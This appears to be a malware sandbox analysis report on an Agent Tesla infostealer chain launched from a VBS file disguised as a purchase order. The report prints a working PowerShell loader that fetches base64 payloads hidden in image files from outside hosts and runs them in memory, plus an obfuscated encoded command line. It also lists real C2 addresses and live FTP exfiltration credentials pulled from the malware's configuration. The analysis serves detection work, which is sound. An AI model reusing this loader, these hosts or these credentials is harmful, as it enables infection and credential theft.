$webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/760/043/full/new_image.jpg?1711287887', 'https://uploaddeimagens.com.br/images/004/760/044/original/new_image.jpg?1711287888'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.orboy/451.342.3.291//:ptth' , 'desativado' , 'desativado' , 'desativado','AddInProcess32',''))} }", Comm
                  Timestamp:04/24/24-06:54:17.860164
                  SID:2020425
                  Source Port:80
                  Destination Port:49733
                  Protocol:TCP
                  Classtype:A Network Trojan was detected

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
                  Source: 4.2.AddInProcess32.exe.400000.0.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.horeca-bucuresti.ro", "Username": "americas2@horeca-bucuresti.ro", "Password": "H*TE9iL;x61m"}
                  Source: orden de compra.vbsReversingLabs: Detection: 15%
                  Source: unknownHTTPS traffic detected: 104.21.84.67:443 -> 192.168.2.4:49730 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.45.138:443 -> 192.168.2.4:49731 version: TLS 1.2

                  Software Vulnerabilities

                  barindex
                  Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

                  Networking

                  barindex
                  Source: TrafficSnort IDS: 2020425 ET CURRENT_EVENTS Unknown EK Landing Feb 16 2015 b64 3 M1 192.3.243.154:80 -> 192.168.2.4:49733
                  Source: C:\Windows\System32\wscript.exeNetwork Connect: 104.21.84.67 443Jump to behavior
                  Source: unknownDNS query: name: paste.ee
                  Source: Yara matchFile source: 4.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: global trafficHTTP traffic detected: GET /images/004/760/043/full/new_image.jpg?1711287887 HTTP/1.1Host: uploaddeimagens.com.brConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /images/004/760/044/original/new_image.jpg?1711287888 HTTP/1.1Host: uploaddeimagens.com.br
                  Source: global trafficHTTP traffic detected: GET /yobro.txt HTTP/1.1Host: 192.3.243.154Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                  Source: Joe Sandbox ViewIP Address: 104.21.45.138 104.21.45.138
                  Source: Joe Sandbox ViewIP Address: 104.21.84.67 104.21.84.67
                  Source: Joe Sandbox ViewIP Address: 104.21.84.67 104.21.84.67
                  Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                  Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                  Source: unknownDNS query: name: ip-api.com
                  Source: global trafficHTTP traffic detected: GET /d/gK5wA HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: paste.eeConnection: Keep-Alive
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.154
                  Source: unknownTCP traffic detected without corresponding DNS query: 192.3.243.154
                  Source: global trafficHTTP traffic detected: GET /d/gK5wA HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: paste.eeConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /images/004/760/043/full/new_image.jpg?1711287887 HTTP/1.1Host: uploaddeimagens.com.brConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /images/004/760/044/original/new_image.jpg?1711287888 HTTP/1.1Host: uploaddeimagens.com.br
                  Source: global trafficHTTP traffic detected: GET /yobro.txt HTTP/1.1Host: 192.3.243.154Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                  Source: unknownDNS traffic detected: queries for: paste.ee
                  Source: powershell.exe, 00000003.00000002.1778680417.000001F40D101000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.243.154
                  Source: powershell.exe, 00000003.00000002.1778680417.000001F40D101000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.243.154/yobro.txt
                  Source: AddInProcess32.exe, 00000004.00000002.2973300391.0000000002AD2000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000004.00000002.2973300391.0000000002AB8000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000004.00000002.2973300391.00000000029F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
                  Source: AddInProcess32.exe, 00000004.00000002.2962871474.0000000000402000.00000040.00000400.00020000.00000000.sdmp, AddInProcess32.exe, 00000004.00000002.2973300391.0000000002AB8000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000004.00000002.2973300391.00000000029F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
                  Source: powershell.exe, 00000003.00000002.2075863098.000001F4167CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                  Source: powershell.exe, 00000003.00000002.1778680417.000001F406975000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                  Source: powershell.exe, 00000001.00000002.2120789924.000001EC000A0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1778680417.000001F406751000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000004.00000002.2973300391.0000000002AB8000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000004.00000002.2973300391.00000000029F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: powershell.exe, 00000003.00000002.1778680417.000001F406975000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                  Source: AddInProcess32.exe, 00000004.00000002.2962871474.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                  Source: powershell.exe, 00000001.00000002.2120789924.000001EC00051000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6
                  Source: powershell.exe, 00000001.00000002.2120789924.000001EC0006C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1778680417.000001F406751000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                  Source: wscript.exe, 00000000.00000002.1689833906.000002262F2CB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1688629994.000002262F145000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee
                  Source: wscript.exe, 00000000.00000002.1689833906.000002262F2CB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1688629994.000002262F145000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee;
                  Source: wscript.exe, 00000000.00000002.1689833906.000002262F2CB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1688629994.000002262F145000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com
                  Source: wscript.exe, 00000000.00000002.1689833906.000002262F2CB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1689833906.000002262F2B7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1688629994.000002262F145000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com;
                  Source: powershell.exe, 00000003.00000002.2075863098.000001F4167CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                  Source: powershell.exe, 00000003.00000002.2075863098.000001F4167CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                  Source: powershell.exe, 00000003.00000002.2075863098.000001F4167CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                  Source: wscript.exe, 00000000.00000002.1689833906.000002262F2CB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1689833906.000002262F2B7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1688629994.000002262F145000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com
                  Source: wscript.exe, 00000000.00000002.1689833906.000002262F2CB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1689833906.000002262F2B7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1688629994.000002262F145000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com;
                  Source: powershell.exe, 00000003.00000002.1778680417.000001F406975000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                  Source: powershell.exe, 00000003.00000002.2075863098.000001F4167CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                  Source: wscript.exe, 00000000.00000003.1687834660.000002262D189000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1689698174.000002262D189000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1688277570.000002262D189000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/
                  Source: wscript.exe, 00000000.00000003.1687834660.000002262D189000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1687834660.000002262D153000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1689698174.000002262D189000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1689136984.000002262D068000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1688277570.000002262D189000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1689698174.000002262D158000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1688629994.000002262F145000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1688277570.000002262D158000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/gK5wA
                  Source: wscript.exe, 00000000.00000003.1687834660.000002262D189000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1689698174.000002262D189000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1688277570.000002262D189000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/gK5wA;
                  Source: wscript.exe, 00000000.00000002.1689631112.000002262D13B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1688154539.000002262D13B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1688844641.000002262D13B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1688770085.000002262D13B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1688629994.000002262F145000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/gK5wAR
                  Source: wscript.exe, 00000000.00000002.1689833906.000002262F2CB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1688629994.000002262F145000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.gravatar.com
                  Source: wscript.exe, 00000000.00000002.1689833906.000002262F2CB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1689833906.000002262F2B7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1688629994.000002262F145000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://themes.googleusercontent.com
                  Source: powershell.exe, 00000003.00000002.1778680417.000001F406975000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uploaddeimagens.com.br
                  Source: powershell.exe, 00000003.00000002.1777989868.000001F4047AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uploaddeimagens.com.br/
                  Source: powershell.exe, 00000003.00000002.1777989868.000001F4046C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uploaddeimagens.com.br/images/004/760/043/full/new_image.jpg?1711287887
                  Source: powershell.exe, 00000003.00000002.1777989868.000001F4046C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uploaddeimagens.com.br/images/004/760/044/original/new_image.jpg?1711287888
                  Source: wscript.exe, 00000000.00000002.1689833906.000002262F2CB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1688629994.000002262F145000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                  Source: wscript.exe, 00000000.00000002.1689833906.000002262F2CB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1689833906.000002262F2B7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1688629994.000002262F145000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com;
                  Source: wscript.exe, 00000000.00000002.1689833906.000002262F2CB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1688629994.000002262F145000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                  Source: unknownHTTPS traffic detected: 104.21.84.67:443 -> 192.168.2.4:49730 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 104.21.45.138:443 -> 192.168.2.4:49731 version: TLS 1.2

                  System Summary

                  barindex
                  Source: 4.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 4.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: AgenetTesla Type 2 Keylogger payload Author: ditekSHen
                  Source: Process Memory Space: powershell.exe PID: 2656, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: Process Memory Space: powershell.exe PID: 3744, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                  Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 8818
                  Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 8818Jump to behavior
                  Source: C:\Windows\System32\wscript.exeCOM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDYDgTreMDgTreDgTrevDgTreDDgTreDgTreNDgTreDgTrezDgTreC8DgTreZgB1DgTreGwDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMQDgTrexDgTreDIDgTreODgTreDgTre3DgTreDgDgTreODgTreDgTre3DgTreCcDgTreLDgTreDgTregDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreBzDgTreDoDgTreLwDgTrevDgTreHUDgTrecDgTreBsDgTreG8DgTreYQBkDgTreGQDgTreZQBpDgTreG0DgTreYQBnDgTreGUDgTrebgBzDgTreC4DgTreYwBvDgTreG0DgTreLgBiDgTreHIDgTreLwBpDgTreG0DgTreY
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDYDgTreMDgTreDgTrevDgTreDDgTreDgTreNDgTreDgTrezDgTreC8DgTreZgB1DgTreGwDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMQDgTrexDgTreDIDgTreODgTreDgTre3DgTreDgDgTreODgTreDgTre3DgTreCcDgTreLDgTreDgTregDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreBzDgTreDoDgTreLwDgTrevDgTreHUDgTrecDgTreBsDgTreG8DgTreYQBkDgTreGQDgTreZQBpDgTreG0DgTreYQBnDgTreGUDgTrebgBzDgTreC4DgTreYwBvDgTreG0DgTreLgBiDgTreHIDgTreLwBpDgTreG0DgTreYJump to behavior
